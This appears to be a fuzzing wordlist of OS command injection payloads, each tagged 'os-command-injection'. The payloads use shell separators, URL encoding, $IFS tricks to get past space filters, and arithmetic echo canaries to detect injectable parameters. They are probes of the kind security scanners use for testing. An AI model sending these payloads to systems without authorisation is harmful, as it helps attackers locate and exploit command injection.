+os-command-injection,'%7C%7Cecho$IFSARRLJF$((7%2B15))$(echo$IFSARRLJF)ARRLJF\' +os-command-injection,'echo$IFSUHEKZF$((6%2B76))$(echo$IFSUHEKZF)UHEKZF&' +os-command-injection,'%20echo%20OQWHLF$((94%2B68))$(echo%20OQWHLF)OQWHLF&' +os-command-injection,';echo$IFSLZAMMD$((45%2B83))$(echo$IFSLZAMMD)LZAMMD&' +os-command-injection,'&echo$IFSXXOEKT$((47%2B54))$(echo$IFSXXOEKT)XXOEKT&' +os-command-injection,'|echo$IFSJEBQGT$((57%2B73))$(echo$IFSJEBQGT)JEBQGT&' +os-command-injection,'||echo$IFSREJVUL$((89%2B39))$(echo$IFSREJVUL)REJVUL&' +os-command-injection,'&&echo$IFSLUKZZL$((74%2B87))$(echo$IFSLUKZZL)LUKZZL&' +os-command-injection,'%0aecho$IFSTMJSKG$((79%2B42))$(echo$IFSTMJSKG)TMJSKG&' +os-command-injection,'%3Becho$IFSNELFTT$((30%2B5))$(echo$IFSNELFTT)NELFTT&' +os-command-injection,'%26echo$IFSIQEANB$((37%2B80))$(echo$IFSIQEANB)IQEANB&' +os-command-injection,'%26%26echo$IFSCJZPXI$((34%2B11))$(echo$IFSCJZPXI)CJZPXI&' +os-command-injection,'%7Cecho$IFSFQIXOT$((96%2B55))$(echo$IFSFQIXOT)FQIXOT&' +os-command-injection,'%7C%7Cecho$IFSUZTFEA$((9%2B38))$(echo$IFSUZTFEA)UZTFEA&' +os-command-injection,'echo$IFSWBZKTL$((54%2B51))$(echo$IFSWBZKTL)WBZKTL|' +os-command-injection,'%20echo%20ZBSMBN$((3%2B0))$(echo%20ZBSMBN)ZBSMBN|' +os-command-injection,';echo$IFSBISSCY$((69%2B34))$(echo$IFSBISSCY)BISSCY|' +os-command-injection,'&echo$IFSJTCTWE$((47%2B19))$(echo$IFSJTCTWE)JTCTWE|' +os-command-injection,'|echo$IFSVPEXDU$((58%2B80))$(echo$IFSVPEXDU)VPEXDU|' +os-command-injection,'||echo$IFSLYCEOO$((22%2B78))$(echo$IFSLYCEOO)LYCEOO|' +os-command-injection,'&&echo$IFSAOWKBV$((93%2B9))$(echo$IFSAOWKBV)AOWKBV|' +os-command-injection,'%0aecho$IFSZBTJIZ$((28%2B56))$(echo$IFSZBTJIZ)ZBTJIZ|' +os-command-injection,'%3Becho$IFSKSUTZJ$((41%2B59))$(echo$IFSKSUTZJ)KSUTZJ|' +os-command-injection,'%26echo$IFSHAFMRE$((74%2B52))$(echo$IFSHAFMRE)HAFMRE|' +os-command-injection,'%26%26echo$IFSEZIXEG$((12%2B57))$(echo$IFSEZIXEG)EZIXEG|' +os-command-injection,'%7Cecho$IFSJHIHOY$((80%2B94))$(echo$IFSJHIHOY)JHIHOY|' +os-command-injection,'%7C%7Cecho$IFSVZAWQN$((40%2B93))$(echo$IFSVZAWQN)VZAWQN|' +os-command-injection,'echo$IFSXIHMMK$((37%2B0))$(echo$IFSXIHMMK)XIHMMK%27' +os-command-injection,'%20echo%20AXKFNN$((42%2B98))$(echo%20AXKFNN)AXKFNN%27' +os-command-injection,';echo$IFSXRJTLU$((75%2B30))$(echo$IFSXRJTLU)XRJTLU%27' +os-command-injection,'&echo$IFSHURAOO$((4%2B19))$(echo$IFSHURAOO)HURAOO%27' +os-command-injection,'|echo$IFSRRFVYH$((99%2B28))$(echo$IFSRRFVYH)RRFVYH%27' +os-command-injection,'||echo$IFSFHYCZU$((73%2B44))$(echo$IFSFHYCZU)FHYCZU%27' +os-command-injection,'&&echo$IFSVOFPVM$((35%2B53))$(echo$IFSVOFPVM)VOFPVM%27' +os-command-injection,'%0aecho$IFSBFBVGP$((41%2B59))$(echo$IFSBFBVGP)BFBVGP%27' +os-command-injection,'%3Becho$IFSOECCYB$((90%2B42))$(echo$IFSOECCYB)OECCYB%27' +os-command-injection,'%26echo$IFSUTPJYK$((7%2B24))$(echo$IFSUTPJYK)UTPJYK%27' +os-command-injection,'%26%26echo$IFSLUCMYV$((14%2B43))$(echo$IFSLUCMYV)LUCMYV%27' +os-command-injection,'%7Cecho$IFSPVRRTF$((94%2B25))$(echo$IFSPVRRTF)PVRRTF%27' +os-command-injection,'%7C%7Cecho$IFSEKSDKJ$((57%2B57))$(echo$IFSEKSDKJ)EKSDKJ%27' +os-command-injection,'echo$IFSFMNKKS$((72%2B97))$(echo$IFSFMNKKS)FMNKKS%22' +os-command-injection,'%20echo%20BRUWPJ$((24%2B60))$(echo%20BRUWPJ)BRUWPJ%22' +os-command-injection,';echo$IFSVBYBZW$((39%2B43))$(echo$IFSVBYBZW)VBYBZW%22' +os-command-injection,'&echo$IFSLMIPEM$((82%2B21))$(echo$IFSLMIPEM)LMIPEM%22' +os-command-injection,'|echo$IFSIEVIHG$((35%2B50))$(echo$IFSIEVIHG)IEVIHG%22' +os-command-injection,'||echo$IFSEULBCJ$((35%2B20))$(echo$IFSEULBCJ)EULBCJ%22' +os-command-injection,'&&echo$IFSCAAYWG$((20%2B2))$(echo$IFSCAAYWG)CAAYWG%22' +os-command-injection,'%0aecho$IFSMWSWXL$((58%2B55))$(echo$IFSMWSWXL)MWSWXL%22' +os-command-injection,'%3Becho$IFSEXIZMZ$((4%2B42))$(echo$IFSEXIZMZ)EXIZMZ%22' +os-command-injection,'%26echo$IFSCVYZVT$((26%2B52))$(echo$IFSCVYZVT)CVYZVT%22' +os-command-injection,'%26%26echo$IFSPFGYCN$((54%2B71))$(echo$IFSPFGYCN)PFGYCN%22' +os-command-injection,'%7Cecho$IFSBKTNUH$((60%2B31))$(echo$IFSBKTNUH)BKTNUH%22' +os-command-injection,'%7C%7Cecho$IFSCBQMAD$((2%2B96))$(echo$IFSCBQMAD)CBQMAD%22' +os-command-injection,'echo$IFSKVWOUC$((99%2B55))$(echo$IFSKVWOUC)KVWOUC%5C%5C' +os-command-injection,'%20echo%20RSFFRY$((9%2B19))$(echo%20RSFFRY)RSFFRY%5C%5C' +os-command-injection,';echo$IFSNCMFZS$((89%2B41))$(echo$IFSNCMFZS)NCMFZS%5C%5C' +os-command-injection,'&echo$IFSBMZKTX$((63%2B94))$(echo$IFSBMZKTX)BMZKTX%5C%5C' +os-command-injection,'|echo$IFSXACUZH$((38%2B20))$(echo$IFSXACUZH)XACUZH%5C%5C' +os-command-injection,'||echo$IFSCDNNJT$((44%2B92))$(echo$IFSCDNNJT)CDNNJT%5C%5C' +os-command-injection,'&&echo$IFSQGZOTF$((32%2B38))$(echo$IFSQGZOTF)QGZOTF%5C%5C' +os-command-injection,'%0aecho$IFSVXNZFI$((43%2B77))$(echo$IFSVXNZFI)VXNZFI%5C%5C' +os-command-injection,'%3Becho$IFSKUUKMT$((50%2B2))$(echo$IFSKUUKMT)KUUKMT%5C%5C' +os-command-injection,'%26echo$IFSUNNWEF$((23%2B41))$(echo$IFSUNNWEF)UNNWEF%5C%5C' +os-command-injection,'%26%26echo$IFSBTZBFI$((26%2B9))$(echo$IFSBTZBFI)BTZBFI%5C%5C' +os-command-injection,'%7Cecho$IFSUXKUGT$((68%2B89))$(echo$IFSUXKUGT)UXKUGT%5C%5C' +os-command-injection,'%7C%7Cecho$IFSCPXZIZ$((42%2B75))$(echo$IFSCPXZIZ)CPXZIZ%5C%5C' +os-command-injection,'echo$IFSNEIUQG$((81%2B27))$(echo$IFSNEIUQG)NEIUQG%2F%2F' +os-command-injection,'%20echo%20AGJORR$((30%2B64))$(echo%20AGJORR)AGJORR%2F%2F' +os-command-injection,';echo$IFSZFBJPC$((94%2B13))$(echo$IFSZFBJPC)ZFBJPC%2F%2F' +os-command-injection,'&echo$IFSBALCSS$((45%2B32))$(echo$IFSBALCSS)BALCSS%2F%2F' +os-command-injection,'|echo$IFSRLIAHI$((26%2B64))$(echo$IFSRLIAHI)RLIAHI%2F%2F' +os-command-injection,'||echo$IFSFYOTZG$((27%2B28))$(echo$IFSFYOTZG)FYOTZG%2F%2F' +os-command-injection,'&&echo$IFSEQAZRH$((48%2B41))$(echo$IFSEQAZRH)EQAZRH%2F%2F' +os-command-injection,'%0aecho$IFSZJGMJR$((29%2B4))$(echo$IFSZJGMJR)ZJGMJR%2F%2F' +os-command-injection,'%3Becho$IFSGOFGQM$((48%2B74))$(echo$IFSGOFGQM)GOFGQM%2F%2F' +os-command-injection,'%26echo$IFSNHIGJT$((60%2B13))$(echo$IFSNHIGJT)NHIGJT%2F%2F' +os-command-injection,'%26%26echo$IFSXIMJKY$((88%2B60))$(echo$IFSXIMJKY)XIMJKY%2F%2F' +os-command-injection,'%7Cecho$IFSOLIGWD$((87%2B60))$(echo$IFSOLIGWD)OLIGWD%2F%2F' +os-command-injection,'%7C%7Cecho$IFSWFKQVE$((90%2B1))$(echo$IFSWFKQVE)WFKQVE%2F%2F' +os-command-injection,'echo$IFSKILZJB$((46%2B73))$(echo$IFSKILZJB)KILZJB%26' +os-command-injection,'%20echo%20QZXLFH$((87%2B1))$(echo%20QZXLFH)QZXLFH%26' +os-command-injection,';echo$IFSKNVVGI$((69%2B44))$(echo$IFSKNVVGI)KNVVGI%26' +os-command-injection,'&echo$IFSGGNKZG$((61%2B42))$(echo$IFSGGNKZG)GGNKZG%26' +os-command-injection,'|echo$IFSOOHCGM$((30%2B35))$(echo$IFSOOHCGM)OOHCGM%26' +os-command-injection,'||echo$IFSUUHQZJ$((20%2B57))$(echo$IFSUUHQZJ)UUHQZJ%26' +os-command-injection,'&&echo$IFSZBRXDH$((79%2B80))$(echo$IFSZBRXDH)ZBRXDH%26' +os-command-injection,'%0aecho$IFSYUKKNH$((56%2B49))$(echo$IFSYUKKNH)YUKKNH%26' +os-command-injection,'%3Becho$IFSVCXHRJ$((81%2B64))$(echo$IFSVCXHRJ)VCXHRJ%26' +os-command-injection,'%26echo$IFSQKYNMI$((45%2B66))$(echo$IFSQKYNMI)QKYNMI%26' +os-command-injection,'%26%26echo$IFSQSKLWT$((87%2B73))$(echo$IFSQSKLWT)QSKLWT%26' +os-command-injection,'%7Cecho$IFSZBEWBO$((6%2B42))$(echo$IFSZBEWBO)ZBEWBO%26' +os-command-injection,'%7C%7Cecho$IFSDNZMGO$((37%2B14))$(echo$IFSDNZMGO)DNZMGO%26' +os-command-injection,'echo$IFSAGOPUQ$((42%2B10))$(echo$IFSAGOPUQ)AGOPUQ%7C' +os-command-injection,'%20echo%20OWFQEK$((68%2B50))$(echo%20OWFQEK)OWFQEK%7C' +os-command-injection,';echo$IFSKGPTGS$((5%2B86))$(echo$IFSKGPTGS)KGPTGS%7C' +os-command-injection,'&echo$IFSSTSBFI$((8%2B30))$(echo$IFSSTSBFI)STSBFI%7C' +os-command-injection,'|echo$IFSCETCMO$((72%2B54))$(echo$IFSCETCMO)CETCMO%7C' +os-command-injection,'||echo$IFSGUUNMQ$((78%2B22))$(echo$IFSGUUNMQ)GUUNMQ%7C' +os-command-injection,'&&echo$IFSSYDVAH$((5%2B92))$(echo$IFSSYDVAH)SYDVAH%7C' +os-command-injection,'%0aecho$IFSEWPWSX$((63%2B88))$(echo$IFSEWPWSX)EWPWSX%7C' +os-command-injection,'%3Becho$IFSQXXUTJ$((23%2B47))$(echo$IFSQXXUTJ)QXXUTJ%7C' +os-command-injection,'%26echo$IFSWWWJLY$((48%2B38))$(echo$IFSWWWJLY)WWWJLY%7C' +os-command-injection,'%26%26echo$IFSAOUDEZ$((1%2B19))$(echo$IFSAOUDEZ)AOUDEZ%7C' +os-command-injection,'%7Cecho$IFSRIYZJH$((86%2B76))$(echo$IFSRIYZJH)RIYZJH%7C' +os-command-injection,'%7C%7Cecho$IFSMCOPIM$((20%2B16))$(echo$IFSMCOPIM)MCOPIM%7C' +os-command-injection,'%26echo$IFSFGJBHF$((15%2B32))$(echo$IFSFGJBHF)FGJBHF' +os-command-injection,'%26%20echo%20TIBIEC$((4%2B66))$(echo%20TIBIEC)TIBIEC' +os-command-injection,';echo$IFSRHWTNA$((89%2B71))$(echo$IFSRHWTNA)RHWTNA' +os-command-injection,'&echo$IFSMIRTWY$((62%2B53))$(echo$IFSMIRTWY)MIRTWY' +os-command-injection,'|echo$IFSKZQOKA$((45%2B18))$(echo$IFSKZQOKA)KZQOKA' +os-command-injection,'||echo$IFSKDFDHF$((15%2B62))$(echo$IFSKDFDHF)KDFDHF' +os-command-injection,'&&echo$IFSARASQY$((54%2B7))$(echo$IFSARASQY)ARASQY' +os-command-injection,'%0aecho$IFSIDFVQL$((32%2B50))$(echo$IFSIDFVQL)IDFVQL' +os-command-injection,'%3Becho$IFSTREOSX$((82%2B26))$(echo$IFSTREOSX)TREOSX' +os-command-injection,'%26echo$IFSKNRSWF$((61%2B96))$(echo$IFSKNRSWF)KNRSWF' +os-command-injection,'%26%26echo$IFSKLSCLG$((90%2B83))$(echo$IFSKLSCLG)KLSCLG' +os-command-injection,'%7Cecho$IFSSWFONC$((23%2B88))$(echo$IFSSWFONC)SWFONC' +os-command-injection,'%7C%7Cecho$IFSPNPVKS$((7%2B36))$(echo$IFSPNPVKS)PNPVKS' +os-command-injection,'echo$IFSMFYMXE$((53%2B41))$(echo$IFSMFYMXE)MFYMXE'' +os-command-injection,'%20echo%20ZEKBWJ$((52%2B55))$(echo%20ZEKBWJ)ZEKBWJ'' +os-command-injection,';echo$IFSHVLOAR$((38%2B86))$(echo$IFSHVLOAR)HVLOAR'' +os-command-injection,'&echo$IFSGQPCYE$((3%2B64))$(echo$IFSGQPCYE)GQPCYE'' +os-command-injection,'|echo$IFSIYVBZD$((59%2B23))$(echo$IFSIYVBZD)IYVBZD'' +os-command-injection,'||echo$IFSKGDWNL$((30%2B97))$(echo$IFSKGDWNL)KGDWNL'' +os-command-injection,'&&echo$IFSOVPFJY$((4%2B71))$(echo$IFSOVPFJY)OVPFJY'' +os-command-injection,'%0aecho$IFSTYZEHS$((92%2B83))$(echo$IFSTYZEHS)TYZEHS'' +os-command-injection,'%3Becho$IFSXKGKWO$((82%2B28))$(echo$IFSXKGKWO)XKGKWO'' +os-command-injection,'%26echo$IFSCTPDWS$((75%2B8))$(echo$IFSCTPDWS)CTPDWS'' +os-command-injection,'%26%26echo$IFSHRVANY$((38%2B49))$(echo$IFSHRVANY)HRVANY'' +os-command-injection,'%7Cecho$IFSSBTHEA$((52%2B44))$(echo$IFSSBTHEA)SBTHEA'' +os-command-injection,'%7C%7Cecho$IFSRGNFOX$((20%2B17))$(echo$IFSRGNFOX)RGNFOX'' +os-command-injection,'echo$IFSCWQJJR$((12%2B68))$(echo$IFSCWQJJR)CWQJJR"' +os-command-injection,'%20echo%20WJGLHQ$((32%2B43))$(echo%20WJGLHQ)WJGLHQ"' +os-command-injection,';echo$IFSWYKTNX$((57%2B37))$(echo$IFSWYKTNX)WYKTNX"' +os-command-injection,'&echo$IFSJZGSQS$((35%2B79))$(echo$IFSJZGSQS)JZGSQS"' +os-command-injection,'|echo$IFSQFRZWC$((58%2B49))$(echo$IFSQFRZWC)QFRZWC"' +os-command-injection,'||echo$IFSUEGFHX$((37%2B52))$(echo$IFSUEGFHX)UEGFHX"' +os-command-injection,'&&echo$IFSWMOQUS$((33%2B35))$(echo$IFSWMOQUS)WMOQUS"' +os-command-injection,'%0aecho$IFSRVNRNT$((25%2B8))$(echo$IFSRVNRNT)RVNRNT"' +os-command-injection,'%3Becho$IFSFGMEVK$((82%2B64))$(echo$IFSFGMEVK)FGMEVK"' +os-command-injection,'%26echo$IFSKWKDEB$((37%2B89))$(echo$IFSKWKDEB)KWKDEB"' +os-command-injection,'%26%26echo$IFSPCPZYO$((56%2B87))$(echo$IFSPCPZYO)PCPZYO"' +os-command-injection,'%7Cecho$IFSATHGRY$((94%2B45))$(echo$IFSATHGRY)ATHGRY"' +os-command-injection,'%7C%7Cecho$IFSPLQDHT$((81%2B8))$(echo$IFSPLQDHT)PLQDHT"' +os-command-injection,'echo$IFSUYTATZ$((65%2B69))$(echo$IFSUYTATZ)UYTATZ' +os-command-injection,'%20echo%20DWUNAS$((73%2B45))$(echo%20DWUNAS)DWUNAS' +os-command-injection,';echo$IFSDYVMJQ$((81%2B59))$(echo$IFSDYVMJQ)DYVMJQ' +os-command-injection,'&echo$IFSSFXMFL$((26%2B3))$(echo$IFSSFXMFL)SFXMFL' +os-command-injection,'|echo$IFSTPUAPH$((74%2B20))$(echo$IFSTPUAPH)TPUAPH' +os-command-injection,'||echo$IFSETWMKB$((45%2B66))$(echo$IFSETWMKB)ETWMKB' +os-command-injection,'&&echo$IFSJQGTZT$((74%2B60))$(echo$IFSJQGTZT)JQGTZT' +os-command-injection,'%0aecho$IFSEMHHKB$((6%2B28))$(echo$IFSEMHHKB)EMHHKB' +os-command-injection,'%3Becho$IFSMQUPHW$((66%2B11))$(echo$IFSMQUPHW)MQUPHW' +os-command-injection,'%26echo$IFSYETOFB$((93%2B7))$(echo$IFSYETOFB)YETOFB' +os-command-injection,'%26%26echo$IFSCRVQIY$((43%2B55))$(echo$IFSCRVQIY)CRVQIY' +os-command-injection,'%7Cecho$IFSQKTYDP$((13%2B93))$(echo$IFSQKTYDP)QKTYDP' +os-command-injection,'%7C%7Cecho$IFSHIOXYU$((5%2B45))$(echo$IFSHIOXYU)HIOXYU' +os-command-injection,'echo$IFSONQRPJ$((44%2B25))$(echo$IFSONQRPJ)ONQRPJ//' +os-command-injection,'%20echo%20IOTEZW$((83%2B52))$(echo%20IOTEZW)IOTEZW//' +os-command-injection,';echo$IFSZIROGF$((6%2B49))$(echo$IFSZIROGF)ZIROGF//' +os-command-injection,'&echo$IFSEGQCCP$((72%2B31))$(echo$IFSEGQCCP)EGQCCP//' +os-command-injection,'|echo$IFSZGMESR$((73%2B1))$(echo$IFSZGMESR)ZGMESR//' +os-command-injection,'||echo$IFSDAJJOA$((63%2B6))$(echo$IFSDAJJOA)DAJJOA//' +os-command-injection,'&&echo$IFSYSBJXS$((33%2B16))$(echo$IFSYSBJXS)YSBJXS//' +os-command-injection,'%0aecho$IFSGAMIHF$((8%2B20))$(echo$IFSGAMIHF)GAMIHF//' +os-command-injection,'%3Becho$IFSGIAMLN$((3%2B33))$(echo$IFSGIAMLN)GIAMLN//' +os-command-injection,'%26echo$IFSSAEWRK$((96%2B15))$(echo$IFSSAEWRK)SAEWRK//' +os-command-injection,'%26%26echo$IFSLRENSC$((21%2B32))$(echo$IFSLRENSC)LRENSC//' +os-command-injection,'%7Cecho$IFSSMHPXX$((60%2B18))$(echo$IFSSMHPXX)SMHPXX//' +os-command-injection,'%7C%7Cecho$IFSXSPEPB$((67%2B12))$(echo$IFSXSPEPB)XSPEPB//' +os-command-injection,'echo$IFSJMCTGN$((61%2B39))$(echo$IFSJMCTGN)JMCTGN\' +os-command-injection,'%20echo%20YGXKOB$((39%2B6))$(echo%20YGXKOB)YGXKOB\' +os-command-injection,';echo$IFSGPDOCC$((56%2B25))$(echo$IFSGPDOCC)GPDOCC\' +os-command-injection,'&echo$IFSJHJDBQ$((59%2B7))$(echo$IFSJHJDBQ)JHJDBQ\' +os-command-injection,'|echo$IFSPYNQQN$((22%2B41))$(echo$IFSPYNQQN)PYNQQN\' +os-command-injection,'||echo$IFSXEGABJ$((43%2B91))$(echo$IFSXEGABJ)XEGABJ\' +os-command-injection,'&&echo$IFSKQEDXL$((91%2B84))$(echo$IFSKQEDXL)KQEDXL\' +os-command-injection,'%0aecho$IFSVXZGNO$((12%2B40))$(echo$IFSVXZGNO)VXZGNO\' +os-command-injection,'%3Becho$IFSPSOQAR$((79%2B87))$(echo$IFSPSOQAR)PSOQAR\' +os-command-injection,'%26echo$IFSRNOWIN$((9%2B87))$(echo$IFSRNOWIN)RNOWIN\' +os-command-injection,'%26%26echo$IFSDKXDPB$((45%2B44))$(echo$IFSDKXDPB)DKXDPB\' +os-command-injection,'%7Cecho$IFSAQWEET$((38%2B66))$(echo$IFSAQWEET)AQWEET\' +os-command-injection,'%7C%7Cecho$IFSXRRNLV$((42%2B73))$(echo$IFSXRRNLV)XRRNLV\' +os-command-injection,'echo$IFSWAXZNH$((13%2B26))$(echo$IFSWAXZNH)WAXZNH&' +os-command-injection,'%20echo%20FMKAYB$((43%2B18))$(echo%20FMKAYB)FMKAYB&' +os-command-injection,';echo$IFSNFQTQE$((64%2B35))$(echo$IFSNFQTQE)NFQTQE&' +os-command-injection,'&echo$IFSGHAYMK$((85%2B70))$(echo$IFSGHAYMK)GHAYMK&' +os-command-injection,'|echo$IFSILKQLY$((38%2B92))$(echo$IFSILKQLY)ILKQLY&' +os-command-injection,'||echo$IFSJTVIEI$((59%2B6))$(echo$IFSJTVIEI)JTVIEI&' +os-command-injection,'&&echo$IFSRUHGTD$((2%2B41))$(echo$IFSRUHGTD)RUHGTD&' +os-command-injection,'%0aecho$IFSYBIRAD$((77%2B75))$(echo$IFSYBIRAD)YBIRAD&' +os-command-injection,'%3Becho$IFSNZACRG$((6%2B1))$(echo$IFSNZACRG)NZACRG&' +os-command-injection,'%26echo$IFSOXDOPZ$((45%2B42))$(echo$IFSOXDOPZ)OXDOPZ&' +os-command-injection,'%26%26echo$IFSMCBQMM$((11%2B98))$(echo$IFSMCBQMM)MCBQMM&' +os-command-injection,'%7Cecho$IFSEJJUPB$((40%2B97))$(echo$IFSEJJUPB)EJJUPB&' +os-command-injection,'%7C%7Cecho$IFSCJGMRV$((68%2B61))$(echo$IFSCJGMRV)CJGMRV&' +os-command-injection,'echo$IFSAAZQPF$((47%2B0))$(echo$IFSAAZQPF)AAZQPF|' +os-command-injection,'%20echo%20GWYMFM$((13%2B53))$(echo%20GWYMFM)GWYMFM|' +os-command-injection,';echo$IFSHKIKWV$((20%2B23))$(echo$IFSHKIKWV)HKIKWV|' +os-command-injection,'&echo$IFSPTGUJI$((21%2B75))$(echo$IFSPTGUJI)PTGUJI|' +os-command-injection,'|echo$IFSESSSWT$((28%2B90))$(echo$IFSESSSWT)ESSSWT|' +os-command-injection,'||echo$IFSDEGINN$((57%2B72))$(echo$IFSDEGINN)DEGINN|' +os-command-injection,'&&echo$IFSLXPMRF$((61%2B87))$(echo$IFSLXPMRF)LXPMRF|' +os-command-injection,'%0aecho$IFSVPYEIG$((0%2B32))$(echo$IFSVPYEIG)VPYEIG|' +os-command-injection,'%3Becho$IFSBJQYNU$((71%2B12))$(echo$IFSBJQYNU)BJQYNU|' +os-command-injection,'%26echo$IFSKZFTIO$((50%2B29))$(echo$IFSKZFTIO)KZFTIO|' +os-command-injection,'%26%26echo$IFSZAYXMZ$((3%2B83))$(echo$IFSZAYXMZ)ZAYXMZ|' +os-command-injection,'%7Cecho$IFSJWHQHE$((54%2B5))$(echo$IFSJWHQHE)JWHQHE|' +os-command-injection,'%7C%7Cecho$IFSHRKGCV$((26%2B87))$(echo$IFSHRKGCV)HRKGCV|' +os-command-injection,'echo$IFSBFVSUE$((14%2B45))$(echo$IFSBFVSUE)BFVSUE%27' +os-command-injection,'%20echo%20IJYFHL$((62%2B88))$(echo%20IJYFHL)IJYFHL%27' +os-command-injection,';echo$IFSGLCFHE$((9%2B20))$(echo$IFSGLCFHE)GLCFHE%27' +os-command-injection,'&echo$IFSBGJFMV$((55%2B92))$(echo$IFSBGJFMV)BGJFMV%27' +os-command-injection,'|echo$IFSZFFAPM$((39%2B91))$(echo$IFSZFFAPM)ZFFAPM%27' +os-command-injection,'||echo$IFSMWPSUX$((83%2B82))$(echo$IFSMWPSUX)MWPSUX%27' +os-command-injection,'&&echo$IFSUUESOS$((61%2B71))$(echo$IFSUUESOS)UUESOS%27' +os-command-injection,'%0aecho$IFSLRBMQR$((4%2B80))$(echo$IFSLRBMQR)LRBMQR%27' +os-command-injection,'%3Becho$IFSLWIDNI$((59%2B10))$(echo$IFSLWIDNI)LWIDNI%27' +os-command-injection,'%26echo$IFSEHCFWA$((81%2B0))$(echo$IFSEHCFWA)EHCFWA%27' +os-command-injection,'%26%26echo$IFSVEMRKI$((43%2B17))$(echo$IFSVEMRKI)VEMRKI%27' +os-command-injection,'%7Cecho$IFSAVHQSF$((54%2B86))$(echo$IFSAVHQSF)AVHQSF%27' +os-command-injection,'%7C%7Cecho$IFSBUDOYZ$((31%2B53))$(echo$IFSBUDOYZ)BUDOYZ%27' +os-command-injection,'echo$IFSJEPZHW$((73%2B73))$(echo$IFSJEPZHW)JEPZHW%22' +os-command-injection,'%20echo%20JMDNRV$((22%2B54))$(echo%20JMDNRV)JMDNRV%22' +os-command-injection,';echo$IFSPRIHYT$((43%2B53))$(echo$IFSPRIHYT)PRIHYT%22' +os-command-injection,'&echo$IFSCMDMMG$((63%2B46))$(echo$IFSCMDMMG)CMDMMG%22' +os-command-injection,'|echo$IFSGFJBIP$((75%2B97))$(echo$IFSGFJBIP)GFJBIP%22' +os-command-injection,'||echo$IFSOXMDCJ$((76%2B31))$(echo$IFSOXMDCJ)OXMDCJ%22' +os-command-injection,'&&echo$IFSLHVDJA$((34%2B71))$(echo$IFSLHVDJA)LHVDJA%22' +os-command-injection,'%0aecho$IFSFLQCFH$((50%2B41))$(echo$IFSFLQCFH)FLQCFH%22' +os-command-injection,'%3Becho$IFSOHDIIO$((86%2B73))$(echo$IFSOHDIIO)OHDIIO%22' +os-command-injection,'%26echo$IFSKOBRCD$((77%2B43))$(echo$IFSKOBRCD)KOBRCD%22' +os-command-injection,'%26%26echo$IFSOWHNUL$((45%2B96))$(echo$IFSOWHNUL)OWHNUL%22' +os-command-injection,'%7Cecho$IFSCYXIRA$((56%2B74))$(echo$IFSCYXIRA)CYXIRA%22' +os-command-injection,'%7C%7Cecho$IFSLSGARN$((66%2B92))$(echo$IFSLSGARN)LSGARN%22' +os-command-injection,'echo$IFSBXVMDK$((6%2B31))$(echo$IFSBXVMDK)BXVMDK%5C%5C' +os-command-injection,'%20echo%20LCFCBB$((47%2B22))$(echo%20LCFCBB)LCFCBB%5C%5C' +os-command-injection,';echo$IFSHWOOOB$((33%2B98))$(echo$IFSHWOOOB)HWOOOB%5C%5C' +os-command-injection,'&echo$IFSPYIUYZ$((71%2B45))$(echo$IFSPYIUYZ)PYIUYZ%5C%5C' +os-command-injection,'|echo$IFSAMCJYH$((20%2B48))$(echo$IFSAMCJYH)AMCJYH%5C%5C' +os-command-injection,'||echo$IFSUCPPVT$((17%2B44))$(echo$IFSUCPPVT)UCPPVT%5C%5C' +os-command-injection,'&&echo$IFSDFYDRA$((1%2B96))$(echo$IFSDFYDRA)DFYDRA%5C%5C' +os-command-injection,'%0aecho$IFSODUPZQ$((21%2B13))$(echo$IFSODUPZQ)ODUPZQ%5C%5C' +os-command-injection,'%3Becho$IFSXJAFQU$((79%2B24))$(echo$IFSXJAFQU)XJAFQU%5C%5C' +os-command-injection,'%26echo$IFSBWATKS$((45%2B68))$(echo$IFSBWATKS)BWATKS%5C%5C' +os-command-injection,'%26%26echo$IFSKBVKTU$((41%2B2))$(echo$IFSKBVKTU)KBVKTU%5C%5C' +os-command-injection,'%7Cecho$IFSIXAXIN$((24%2B47))$(echo$IFSIXAXIN)IXAXIN%5C%5C' +os-command-injection,'%7C%7Cecho$IFSXZTTAD$((21%2B98))$(echo$IFSXZTTAD)XZTTAD%5C%5C' +os-command-injection,'echo$IFSYIGMIK$((93%2B31))$(echo$IFSYIGMIK)YIGMIK%2F%2F' +os-command-injection,'%20echo%20PIWJVB$((35%2B55))$(echo%20PIWJVB)PIWJVB%2F%2F' +os-command-injection,';echo$IFSAQHLIY$((38%2B77))$(echo$IFSAQHLIY)AQHLIY%2F%2F' +os-command-injection,'&echo$IFSCXFXGD$((63%2B87))$(echo$IFSCXFXGD)CXFXGD%2F%2F' +os-command-injection,'|echo$IFSUZPDRC$((26%2B91))$(echo$IFSUZPDRC)UZPDRC%2F%2F' +os-command-injection,'||echo$IFSAOIEWW$((12%2B22))$(echo$IFSAOIEWW)AOIEWW%2F%2F' +os-command-injection,'&&echo$IFSTRGLMB$((67%2B67))$(echo$IFSTRGLMB)TRGLMB%2F%2F' +os-command-injection,'%0aecho$IFSTWDCWQ$((75%2B11))$(echo$IFSTWDCWQ)TWDCWQ%2F%2F' +os-command-injection,'%3Becho$IFSCAANPZ$((68%2B82))$(echo$IFSCAANPZ)CAANPZ%2F%2F' +os-command-injection,'%26echo$IFSVUHFEV$((97%2B15))$(echo$IFSVUHFEV)VUHFEV%2F%2F' +os-command-injection,'%26%26echo$IFSCFKMSQ$((61%2B81))$(echo$IFSCFKMSQ)CFKMSQ%2F%2F' +os-command-injection,'%7Cecho$IFSUSIKAS$((1%2B68))$(echo$IFSUSIKAS)USIKAS%2F%2F' +os-command-injection,'%7C%7Cecho$IFSXCDKHN$((36%2B59))$(echo$IFSXCDKHN)XCDKHN%2F%2F' +os-command-injection,'echo$IFSVNBHRD$((3%2B40))$(echo$IFSVNBHRD)VNBHRD%26' +os-command-injection,'%20echo%20NJKFHE$((39%2B55))$(echo%20NJKFHE)NJKFHE%26' +os-command-injection,';echo$IFSSFSQHL$((95%2B33))$(echo$IFSSFSQHL)SFSQHL%26' +os-command-injection,'&echo$IFSHBNWJW$((18%2B27))$(echo$IFSHBNWJW)HBNWJW%26' +os-command-injection,'|echo$IFSGOWBHJ$((93%2B50))$(echo$IFSGOWBHJ)GOWBHJ%26' +os-command-injection,'||echo$IFSWOSZUB$((94%2B79))$(echo$IFSWOSZUB)WOSZUB%26' +os-command-injection,'&&echo$IFSLXSNBD$((51%2B37))$(echo$IFSLXSNBD)LXSNBD%26' +os-command-injection,'%0aecho$IFSKKFGER$((40%2B66))$(echo$IFSKKFGER)KKFGER%26' +os-command-injection,'%3Becho$IFSMSQSJK$((23%2B24))$(echo$IFSMSQSJK)MSQSJK%26' +os-command-injection,'%26echo$IFSWJHRPR$((2%2B76))$(echo$IFSWJHRPR)WJHRPR%26' 